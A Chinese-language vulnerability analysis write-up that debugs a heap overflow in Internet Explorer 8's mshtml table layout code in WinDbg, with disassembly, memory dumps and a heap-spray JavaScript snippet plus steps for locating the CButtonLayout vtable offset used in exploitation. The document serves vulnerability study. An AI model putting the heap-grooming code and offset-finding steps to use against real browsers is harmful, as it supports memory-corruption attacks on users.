.text:74DF8FF6 call ?_HeapRealloc@@YGJPAPAXI@Z ; ->执行完CimplAry::EnsureSizeWorker函数保存的返回地址在CTableLayout+0x90+0xC,即导致漏洞的堆块,标记为vulheap
.text:74DF8FFB mov ebx, eax
.text:74DF8FFD test ebx, ebx
.text:74DF8FFF jnz short loc_74DF900B
.text:74DF9001

我们看下分配的缓冲区vulheap地址。

1
2
3
4
5
6
7
8
1:025> bp mshtml!CTableLayout::CalculateMinMax+0x168
1:025> g
Breakpoint 1 hit
eax=00000001 ebx=0492aea8 ecx=00000000 edx=00000001 esi=0492af38 edi=0492af38
eip=692d02f2 esp=0467e40c ebp=0467e4ac iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
mshtml!CTableLayout::CalculateMinMax+0x1d3:
692d02f2 e8c08c0c00 call mshtml!CImplAry::EnsureSizeWorker (69398fb7)

分配的地址在ebx+0x9C

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
1:025> p
eax=00000000 ebx=0492aea8 ecx=7741349f edx=00000000 esi=0492af38 edi=0492af38
eip=692d02f7 esp=0467e410 ebp=0467e4ac iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
mshtml!CTableLayout::CalculateMinMax+0x1df:
692d02f7 85c0 test eax,eax
1:025> dd ebx+9c
0492af44 07e20f90 00000000 00000000 00000000
0492af54 00000000 00000000 00000000 00000000
0492af64 00000000 000000c8 000000c8 00000000
0492af74 00000000 00000000 00000000 00000000
0492af84 00000000 00000000 00000000 00000000
0492af94 00000000 00000000 00000000 00000000
0492afa4 00000000 00000000 00000000 ffffffff
0492afb4 00000001 00000000 00000000 00000000
1:025> dd 07e20f90
07e20f90 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
07e20fa0 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
07e20fb0 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
07e20fc0 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
07e20fd0 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
07e20fe0 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
07e20ff0 c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
07e21000 ???????? ???????? ???????? ????????

1:025> !heap -p -a 07e20f90
address 07e20f90 found in
_DPH_HEAP_ROOT @ 171000
in busy allocation ( DPH_HEAP_BLOCK: UserAddr UserSize - VirtAddr VirtSize)
7e71f70: 7e20f90 70 - 7e20000 2000

此外,我们看一下用于比较的spansum和spancmp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
1:025> dd ebx+54
0492aefc 00000001 00000000 ffffffff 00000000
0492af0c ffffffff 691c9fd0 00000004 00000004
0492af1c 0497eff0 691c9fd0 00000004 00000004
0492af2c 04936ff0 00000000 00000000 691c9fd0
0492af3c 00000000 00000004 07f27f90 00000000
0492af4c 00000000 00000000 00000000 00000000
0492af5c 00000000 00000000 00000000 000000c8
0492af6c 000000c8 00000000 00000000 00000000
1:025> dd ebx+94
0492af3c 00000000 00000004 07f27f90 00000000
0492af4c 00000000 00000000 00000000 00000000
0492af5c 00000000 00000000 00000000 000000c8
0492af6c 000000c8 00000000 00000000 00000000
0492af7c 00000000 00000000 00000000 00000000
0492af8c 00000000 00000000 00000000 00000000
0492af9c 00000000 00000000 00000000 00000000
0492afac 00000000 ffffffff 00000001 00000000

从上面的代码段可知,这里分配了0x70大小的内存地址在CtableLayout+0x9C指向的地址。
总结:

  • CtableLayout::CalculateMinMax的第一个参数为CtableLayout对象,即table标签在内存中的对象。
  • CtableLayout+0x54:span属性值和spansum
  • CtableLayout+0x9C: 保存vulheap,至少分配0x70字节的内存
  • CtableLayout+0x94:用于和spansum比较的spancmp,当spancmp>>2小于spansum才分配漏洞堆块。

要注意的地方
再次g之后会出现允许activeX允许这个框,

然后发现

这我也不知道是中间再次在哪触发了这个函数,还是重新运行了poc,总之这个时候的spansum和spancmp都没变,分别为1和0.
我觉得可能是中间又在哪触发了吧,不像是重新运行了,我也不确定是为什么,没有完整的阅读这个模块。
总之再次g之后,就和泉哥书上一致了。spansum还是1,spancmp变成4.

当分配完内存后,执行poc中的over_trigger函数时,会再一次断在CTableLayout::CalculateMinMax函数中,跟进去看下spansum和spancmp的值。

1
2
3
4
5
6
1:025> bl
0 e 692d018a 0001 (0001) 1:**** mshtml!CTableLayout::CalculateMinMax
1 e 692d02f2 0001 (0001) 1:**** mshtml!CTableLayout::CalculateMinMax+0x1d3
1:025> bc 1
1:025> bl
0 e 692d018a 0001 (0001) 1:**** mshtml!CTableLayout::CalculateMinMax

把之前设置的多余断点删掉,注意bc后跟的是断点的标号。

1
2
3
4
5
6
7
8
9
10
11
1:025> g
(c84.e94): Unknown exception - code 80010108 (first chance)
(c84.e94): Unknown exception - code 80010108 (first chance)
(c84.8e8): Unknown exception - code 80010108 (first chance)
(c84.758): Unknown exception - code 80010108 (first chance)
Breakpoint 0 hit
eax=ffffffff ebx=063bbea8 ecx=00412802 edx=ffffffff esi=00000000 edi=0467e70c
eip=692d018a esp=0467e4b0 ebp=0467e6c8 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
mshtml!CTableLayout::CalculateMinMax:
692d018a 8bff mov edi,edi
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
1:025> dd ebx+54
082e6efc 00000001 ffffffff ffffffff ffffffff
082e6f0c ffffffff 691c9fd0 00000004 00000004
082e6f1c 0816bff0 691c9fd0 00000004 00000004
082e6f2c 082a2ff0 00000000 00000000 691c9fd0
082e6f3c 00000004 00000004 070f4f90 00000000
082e6f4c 00000000 00000000 00000000 00000000
082e6f5c 00000000 00000000 00000000 000000c8
082e6f6c 000000c8 00000000 00000000 00000000
1:025> dd ebx+94
082e6f3c 00000004 00000004 070f4f90 00000000
082e6f4c 00000000 00000000 00000000 00000000
082e6f5c 00000000 00000000 00000000 000000c8
082e6f6c 000000c8 00000000 00000000 00000000
082e6f7c 00000000 00000000 00000000 00000001
082e6f8c 00000000 00000000 00000000 00000000
082e6f9c 00000000 00000000 00000000 00000000
082e6fac 00000000 ffffffff 00000001 00000000

spansum为1,spancmp的值为4,(4>>2)为1==1,不发生跳转,不分配内存。

但是在over_trigger中,我们已经将span设置为1000了,这也是允许的最大值。
接着执行到mshtml!CTableLayout::CalculateMinMax+0x37e,我本来bp了一个断点在这,然后g一下,可是并没有断下来(这里没有断下来应该还是我断点下错了,没有进入那个断点的语句块),所以没办法,单步p呗,然后发现了新姿势,p 10能一次10下。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
1:025> p
eax=08864fd0 ebx=082e6ea8 ecx=00000032 edx=00000000 esi=04f47fac edi=08864fd0
eip=69465a2e esp=0467e410 ebp=0467e4ac iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
mshtml!CTableLayout::CalculateMinMax+0x37e:
69465a2e e8d445dfff call mshtml!CTableCol::GetAAspan (6925a007)--->获取span列数,此处返回1
1:025> p
eax=00000001-->返回值 ebx=082e6ea8 ecx=00000002 edx=082d0ff0 esi=04f47fac edi=08864fd0
eip=69465a33 esp=0467e410 ebp=0467e4ac iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
mshtml!CTableLayout::CalculateMinMax+0x383:
69465a33 3de8030000 cmp eax,3E8h--->span最多为1000
1:025> p
eax=00000001 ebx=082e6ea8 ecx=00000002 edx=082d0ff0 esi=04f47fac edi=08864fd0
eip=69465a38 esp=0467e410 ebp=0467e4ac iopl=0 nv up ei ng nz ac po cy
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000293
mshtml!CTableLayout::CalculateMinMax+0x388:
69465a38 894510 mov dword ptr [ebp+10h],eax ss:0023:0467e4bc=00000000
1:025> p
eax=00000001 ebx=082e6ea8 ecx=00000002 edx=082d0ff0 esi=04f47fac edi=08864fd0
eip=69465a3b esp=0467e410 ebp=0467e4ac iopl=0 nv up ei ng nz ac po cy
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000293
mshtml!CTableLayout::CalculateMinMax+0x38b:
69465a3b 7c07 jl mshtml!CTableLayout::CalculateMinMax+0x394 (69465a44) [br=1]

在mshtml!CTableCol::GetAAspan下断点,让它第二次获取span值的时候断下来。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
1:025> bp mshtml!CTableCol::GetAAspan
1:025> g
Breakpoint 0 hit
eax=ffffffff ebx=082e6ea8 ecx=00402c02 edx=ffffffff esi=00000000 edi=0467df24
eip=692d018a esp=0467dcc8 ebp=0467dee0 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
mshtml!CTableLayout::CalculateMinMax:
692d018a 8bff mov edi,edi
1:025> g
Breakpoint 1 hit
eax=08864fd0 ebx=082e6ea8 ecx=00000032 edx=00000000 esi=04f47fac edi=08864fd0
eip=6925a007 esp=0467dc24 ebp=0467dcc4 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
mshtml!CTableCol::GetAAspan:
6925a007 8bff mov edi,edi
1:025> gu
eax=000003e8--->返回值,此时span的值已经是0x3e8即最大值1000了 ebx=082e6ea8 ecx=00000002 edx=082d0ff0 esi=04f47fac edi=08864fd0
eip=69465a33 esp=0467dc28 ebp=0467dcc4 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000202
mshtml!CTableLayout::CalculateMinMax+0x383:
69465a33 3de8030000 cmp eax,3E8h

gu是执行到当前函数结束返回。
此时span的值已经是0x3e8即最大值1000了。
继续分析后续代码。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
text:74EC5AB3                 call    ?GetPixelWidth@CWidthUnitValue@@QBEHPBVCDocInfo@@PAVCElement@@H@Z ; CWidthUnitValue::GetPixelWidth(CDocInfo const *,CElement *,int)
.text:74EC5AB8 cmp [ebp+var_5C], 0
.text:74EC5ABC mov [ebp+var_2C], eax;--->计算width得到copydata=width*100
....
...
...
.text:74EC5B3E mov eax, [ebp+arg_8];----->span=1000
.text:74EC5B41 imul ecx, 1Ch---->1000*0x1C
.text:74EC5B44 add [ebp+var_38], eax
.text:74EC5B47 mov [ebp+var_20], ecx
.text:74EC5B4A jmp short loc_74EC5B4F;---->vulheap地址
.text:74EC5B4C ; ---------------------------------------------------------------------------
.text:74EC5B4C
.text:74EC5B4C loc_74EC5B4C: ; CODE XREF: CTableLayout::CalculateMinMax(CTableCalcInfo *,int)+195A11j
.text:74EC5B4C mov ecx, [ebp+var_20]
.text:74EC5B4F
.text:74EC5B4F loc_74EC5B4F: ; CODE XREF: CTableLayout::CalculateMinMax(CTableCalcInfo *,int)+1959C0j
.text:74EC5B4F mov eax, [ebx+9Ch];---->vulheap地址
.text:74EC5B55 add eax, ecx;----->offset=vulheap+1000*0x1c>0x70(vulheap大小),最终会导致堆溢出!
.text:74EC5B57 cmp [ebp+var_1C], 0
.text:74EC5B5B mov [ebp+var_24], eax;---->作为后面AdjustForCol函数的参数
.text:74EC5B5E jz short loc_74EC5B7A
.text:74EC5B60 mov eax, [ebp+arg_8]
.text:74EC5B63 cmp eax, 1
.text:74EC5B66 jle short loc_74EC5B7A
.text:74EC5B68 dec eax
.text:74EC5B69 cmp [ebp+var_14], eax
.text:74EC5B6C jnz short loc_74EC5B7A
.text:74EC5B6E imul eax, [ebp+var_C]
.text:74EC5B72 mov ecx, [ebp+var_2C]
.text:74EC5B75 sub ecx, eax ; this
.text:74EC5B77 mov [ebp+var_C], ecx
.text:74EC5B7A push [ebp+var_3C] ; struct CCalcInfo *
.text:74EC5B7D mov eax, [ebp+var_34]
.text:74EC5B80 push [ebp+arg_4] ; int
.text:74EC5B83 mov esi, [ebp+var_24]
.text:74EC5B86 push [ebp+var_C] ; ---->前面经width计算得到的Copydata,即用于复制到vulheap的数据内容。
.text:74EC5B89 call ?AdjustForCol@CTableColCalc@@QAEXPBVCWidthUnitValue@@HPAVCCalcInfo@@H@Z ; CTableColCalc::AdjustForCol(CWidthUnitValue const *,int,CCalcInfo *,int)

复制的内容相当于width * 100得到的数值,比如此处为0x41,则复制内容为0x41 * 1000=0x1004
在AdjustForCol中,会以1000 * 0x1c位计数循环向vulheap写入数据,最终造成heap溢出。
再g就崩溃了。


总结

  1. 当页面加载,CTableLayout::CalculateMinMax被首次调用,col的span属性被初始化为1,此时spansum=1,spancmp=0
  2. 由于(spancmp>>2)<spansum,即0<1,调用EnsureSizeWorker函数分配大小为0x1c * spansum的内存,但至少分配0x1C * 4=0x70大小的内存块。
  3. 分配内存后,spancmp=spansum * 4 = 4,此时(spancmp>>2)==spansum,即4/4==1,因此不再分配内存
  4. 调用over_trigger,CTableLayout::MinMax第二次被调用,但spansum和spancmp未变,而span被更改为1000,在复制内容为width * 100的数据到分配缓冲区时,会以span为循环计数器写vulheap堆块,但是1000 * 0x1C > 0x70,最终造成堆溢出。

经过调试,泉哥142页shr eax,2理解错了,那个shr是右移的意思,而泉哥写的是左移运算符<<

实现漏洞利用

关于exp的编写请参考漏洞战争,这里只调试一些关键思路。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
<div id="test"></div>
<script language='javascript'>

var leak_index = -1;

var dap = "EEEE";
while ( dap.length < 480 ) dap += dap;

var padding = "AAAA";
while ( padding.length < 480 ) padding += padding;

var filler = "BBBB";
while ( filler.length < 480 ) filler += filler;

//spray
var arr = new Array();
var rra = new Array();

var div_container = document.getElementById("test");
div_container.style.cssText = "display:none";

for (var i=0; i < 500; i+=2) {

// E
rra[i] = dap.substring(0, (0x100-6)/2);

// S, bstr = A
arr[i] = padding.substring(0, (0x100-6)/2);

// A, bstr = B
arr[i+1] = filler.substring(0, (0x100-6)/2);

// B
var obj = document.createElement("button");
div_container.appendChild(obj);

}

for (var i=200; i<500; i+=2 ) {
rra[i] = null;
CollectGarbage();
}

</script>

这部分主要是用来构造堆布局,构造结果如下。

然后从中间(200)开始释放EEEE…,腾出空间。
释放的位置就是为了在分配vulheap时能够占用到释放位置中的一个,当溢出时就可以占用到后面的字符串和CButtonLayout。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
************* Symbol Path validation summary **************
Response Time (ms) Location
Deferred srv*

************* Symbol Path validation summary **************
Response Time (ms) Location
Deferred srv*

Microsoft (R) Windows Debugger Version 6.3.9600.17200 X86
Copyright (c) Microsoft Corporation. All rights reserved.

*** wait with pending attach

************* Symbol Path validation summary **************
Response Time (ms) Location
Deferred srv*

************* Symbol Path validation summary **************
Response Time (ms) Location
Deferred srv*
Symbol search path is: srv*
Executable search path is: srv*
ModLoad: 013c0000 01466000 C:\Program Files\Internet Explorer\iexplore.exe
(c0.ea8): Break instruction exception - code 80000003 (first chance)
eax=7ff96000 ebx=00000000 ecx=00000000 edx=77a0d23d esi=00000000 edi=00000000
eip=779a3540 esp=07abfe00 ebp=07abfe2c iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
ntdll!DbgBreakPoint:
779a3540 cc int 3
0:021> .childdbg 1
Processes created by the current process will be debugged
0:021> .symfix
0:021> .reload
Reloading current modules
................................................................
...........
0:021> sxe ld:jscript
0:021> g

************* Symbol Path validation summary **************
Response Time (ms) Location
Deferred srv*

************* Symbol Path validation summary **************
Response Time (ms) Location
Deferred srv*
Symbol search path is: srv*
Executable search path is: srv*
(fd4.630): Break instruction exception - code 80000003 (first chance)
eax=00000000 ebx=00000000 ecx=0014f620 edx=779b64f4 esi=fffffffe edi=00000000
eip=77a0e60e esp=0014f63c ebp=0014f668 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
ntdll!LdrpDoDebuggerBreak+0x2c:
77a0e60e cc int 3
1:014> lmm jscript
start end module name
1:014> g
ModLoad: 6f640000 6f6f2000 C:\Windows\System32\jscript.dll
eax=0345de14 ebx=00000000 ecx=00000007 edx=00000000 esi=7ffda000 edi=0345e22c
eip=779b64f4 esp=0345e144 ebp=0345e198 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
ntdll!KiFastSystemCallRet:
779b64f4 c3 ret
1:023> lmm jscript
start end module name
6f640000 6f6f2000 jscript (deferred)

先通过windbg attach ie,然后打开childdbg,因为刚开始IE还没有加载jsript.dll,所以可以先设置加载jscript.dll时断下(sxe),按g运行,拖入exp。
lmm确定载入后,再对JSCollectGarbage下断(bp),然后g运行。

1
2
3
4
5
6
7
8
1:023> bp jscript!JsCollectGarbage
1:023> g
Breakpoint 0 hit
eax=0345f0f0 ebx=0345f0a0 ecx=0136e0a0 edx=6f6c8555 esi=0136ff40 edi=0345f090
eip=6f6c8555 esp=0345f050 ebp=0345f0b4 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
jscript!JsCollectGarbage:
6f6c8555 a180d06d6f mov eax,dword ptr [jscript!g_luTls (6f6dd080)] ds:0023:6f6dd080=00000038

继续下断,找到vulheap分配的位置,具体分析参考漏洞战争。

1
2
3
4
5
6
1:023> bl
0 e 6f6c8555 0001 (0001) 1:**** jscript!JsCollectGarbage
1:023> bd 0
1:023> bu ntdll!RtlFreeHeap ".echo free heap;db poi(esp+c) l10;g"
1:023> bu mshtml!CTableLayout::CalculateMinMax+0x16d ".echo vulheap;dd poi(ebx+9c) l4;g"
1:023> bu jscript!JsStrSubString
1
2
1:023> .logopen
Opened log file 'dbgeng.log

打开log文件做记录,另外我在jscript!JsStrSubString下了额外的断点。
此外改动一下exp,加个alert。

1
2
3
4
<script language='javascript'>
alert(1);
var obj_col = document.getElementById("132");
obj_col.span = 19;

断下

1
2
3
4
5
6
7
8
9
10
11
12
13
14
.....
.....
.....
.....
free heap
0156d718 ff ff ff ff ff ff ff ff-80 32 0c 04 00 00 00 00 .........2......
free heap
040c3280 80 59 ed 69 00 00 00 00-00 00 00 00 c7 59 e9 00 .Y.i.........Y..
Breakpoint 5 hit
eax=0375f108 ebx=0375efa0 ecx=02f01318 edx=6eb289cb esi=02f05800 edi=0375f2b4
eip=6eb289cb esp=0375ef50 ebp=0375efb4 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
jscript!JsStrSubstring:
6eb289cb 8bff mov edi,edi
1
2
1:025> .logclose
Closing open log file dbgeng.log

保存之后,最后一个vulheap就是我们要找的.

另外为了确定虚表偏移,直接动态找一下吧。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
1:027> x mshtml!CButtonLayout::*
6a04519d mshtml!CButtonLayout::GetThemeClassId (<no parameter info>)
6a0c0d9d mshtml!CButtonLayout::GetInsets (<no parameter info>)
69ff3c90 mshtml!CButtonLayout::`vftable' = <no type information>
6a045499 mshtml!CButtonLayout::GetAutoSize (<no parameter info>)
6a2562f6 mshtml!CButtonLayout::HitTestContent (<no parameter info>)
6a02b4b7 mshtml!CButtonLayout::DrawClientBackground (<no parameter info>)
69ff9251 mshtml!CButtonLayout::Init (<no parameter info>)
6a045499 mshtml!CButtonLayout::GetMultiLine (<no parameter info>)
6a1c61d8 mshtml!CButtonLayout::s_layoutdesc = <no type information>
6a2562e6 mshtml!CButtonLayout::GetBtnHelper (<no parameter info>)
6a256121 mshtml!CButtonLayout::GetFocusShape (<no parameter info>)
6a1c61d1 mshtml!CButtonLayout::GetLayoutDesc (<no parameter info>)
6a256281 mshtml!CButtonLayout::DoLayout (<no parameter info>)
6a04519d mshtml!CButtonLayout::GetWordWrap (<no parameter info>)
69ff3af8 mshtml!CButtonLayout::`vftable' = <no type information>
6a02b4f2 mshtml!CButtonLayout::DrawClient (<no parameter info>)
6a0a32da mshtml!CButtonLayout::`scalar deleting destructor' (<no parameter info>)
6a255f61 mshtml!CButtonLayout::DrawClientBorder (<no parameter info>)
6a0a32da mshtml!CButtonLayout::`vector deleting destructor' (<no parameter info>)
6a0c2394 mshtml!CButtonLayout::GetDefaultSize (<no parameter info>)

奇怪的是,有两个虚表,这里我也不知道为什么……

1
2
3
1:027> lmm mshtml
start end module name
69e80000 6a432000 mshtml (pdb symbols) C:\WinDbg\x86\sym\mshtml.pdb\5B825981E9B445BBB998A27119FF0D6E2\mshtml.pdb

69ff3af8-69e80000=0x00173af8
这和泉哥书上说的中文版win7+ie8环境中的偏移也是一致的。


然后这我就很不解了……
此外看一下vulheap。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
1:026> db 03f2ae30 l101c
03f2ae30 04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00 ................
03f2ae40 45 00 45 00 41 00 45 00-48 00 01 00 04 10 00 00 E.E.A.E.H.......
03f2ae50 04 10 00 00 04 10 00 00-00 00 00 00 45 00 45 00 ............E.E.
03f2ae60 41 00 45 00 48 00 01 00-04 10 00 00 04 10 00 00 A.E.H...........
03f2ae70 04 10 00 00 00 00 00 00-45 00 45 00 41 00 45 00 ........E.E.A.E.
03f2ae80 48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00 H...............
03f2ae90 00 00 00 00 45 00 45 00-41 00 45 00 48 00 01 00 ....E.E.A.E.H...
03f2aea0 04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00 ................
03f2aeb0 45 00 45 00 41 00 45 00-48 00 01 00 04 10 00 00 E.E.A.E.H.......
03f2aec0 04 10 00 00 04 10 00 00-00 00 00 00 45 00 45 00 ............E.E.
03f2aed0 41 00 45 00 48 00 01 00-04 10 00 00 04 10 00 00 A.E.H...........
03f2aee0 04 10 00 00 00 00 00 00-45 00 45 00 41 00 45 00 ........E.E.A.E.
03f2aef0 48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00 H...............
03f2af00 00 00 00 00 45 00 45 00-41 00 45 00 48 00 01 00 ....E.E.A.E.H...
03f2af10 04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00 ................
03f2af20 45 00 45 00 41 00 45 00-48 00 01 00 04 10 00 00 E.E.A.E.H.......
03f2af30 04 10 00 00 04 10 00 00-0c 61 81 04 00 00 00 00 .........a......
03f2af40 02 00 00 00 48 00 01 00-04 10 00 00 04 10 00 00 ....H...........
03f2af50 04 10 00 00 41 00 41 00-41 00 41 00 41 00 41 00 ....A.A.A.A.A.A.
03f2af60 48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00 H...............
03f2af70 41 00 41 00 41 00 41 00-41 00 41 00 48 00 01 00 A.A.A.A.A.A.H...
03f2af80 04 10 00 00 04 10 00 00-04 10 00 00 41 00 41 00 ............A.A.
03f2af90 41 00 41 00 41 00 41 00-48 00 01 00 04 10 00 00 A.A.A.A.H.......
03f2afa0 04 10 00 00 04 10 00 00-41 00 41 00 41 00 41 00 ........A.A.A.A.
03f2afb0 41 00 41 00 48 00 01 00-04 10 00 00 04 10 00 00 A.A.H...........
03f2afc0 04 10 00 00 41 00 41 00-41 00 41 00 41 00 41 00 ....A.A.A.A.A.A.
03f2afd0 48 00 01 00 04 10 00 00-04 10 00 00 04 10 00 00 H...............
03f2afe0 41 00 41 00 41 00 41 00-41 00 41 00 48 00 01 00 A.A.A.A.A.A.H...
03f2aff0 04 10 00 00 04 10 00 00-04 10 00 00 41 00 41 00 ............A.A.
03f2b000 41 00 41 00 41 00 41 00-48 00 01 00 04 10 00 00 A.A.A.A.H.......
03f2b010 04 10 00 00 04 10 00 00-41 00 41 00 41 00 41 00 ........A.A.A.A.
03f2b020 41 00 41 00 48 00 01 00-04 10 00 00 04 10 00 00 A.A.H...........
03f2b030 04 10 00 00 41 00 41 00-41 00 41 00 41 00 41 00 ....A.A.A.A.A.A.
03f2b040 48 00 01 00 41 00 00 00-20 10 d1 01 00 00 00 c2 H...A... .......
03f2b050 0c 61 81 04 00 00 00 00-02 00 00 00 18 00 02 05 .a..............
03f2b060 fa 00 00 00 42 00 42 00-42 00 42 00 42 00 42 00 ....B.B.B.B.B.B.
03f2b070 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b080 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b090 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b0a0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b0b0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b0c0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b0d0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b0e0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b0f0 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b100 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b110 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b120 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b130 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b140 42 00 42 00 42 00 42 00-42 00 42 00 42 00 42 00 B.B.B.B.B.B.B.B.
03f2b150 42 00 42 00 42 00 42 00-42 00 42 00 42 00 00 00 B.B.B.B.B.B.B...
03f2b160 05 10 d1 01 00 00 00 c2-c0 6a 81 04 00 00 00 00 .........j......
03f2b170 02 00 00 00 1c 00 02 05-f8 3a 8d 68 10 0b 37 01 .........:.h..7.
03f2b180 70 90 ef 03 90 3c 8d 68-01 00 00 00 00 00 00 00 p....<.h........
03f2b190 09 08 08 01 ff ff ff ff-00 00 00 00 00 00 00 00 ................
03f2b1a0 00 00 00 00 ff ff ff ff-80 00 00 00 ff ff ff ff ................
03f2b1b0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
03f2b1c0 00 00 00 00 24 00 00 00-20 00 00 00 00 00 00 00 ....$... .......
03f2b1d0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
03f2b1e0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
03f2b1f0 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
03f2b200 00 00 00 00 00 00 00 00-00 00 00 00 28 b2 f2 03 ............(...
03f2b210 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
03f2b220 01 00 00 00 01 00 00 00-00 00 00 00 00 00 00 00 ................
03f2b230 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
03f2b240 ff ff ff ff ff ff ff ff-ff ff ff ff ff ff ff ff ................
03f2b250 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
03f2b260 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 ................
03f2b270 00 00 00 00 00 00 00 00-66 10 d1 01 00 00 00 c2 ........f.......
03f2b280 a4 30 a9 03 00 00 00 00-02 00 00 00 1c 00 02 05 .0..............
03f2b290 04 10 00 00 04 10 00 00-04 10 00 00 00 00 00 00 ................
03f2b2a0 45 00 45 00 41 00 45 00-48 00 01 00 04 10 00 00 E.E.A.E.H.......
03f2b2b0 04 10 00 00 04 10 00 00-00 00 00 00 45 00 45 00 ............E.E.
03f2b2c0 41 00 45 00 48 00 01 00-04 10 00 00 04 10 00 00 A.E.H...........
03f2b2d0 04 10 00 00 00 00 00 00-45 00 45 00 41 00 45 00 ........E.E.A.E.
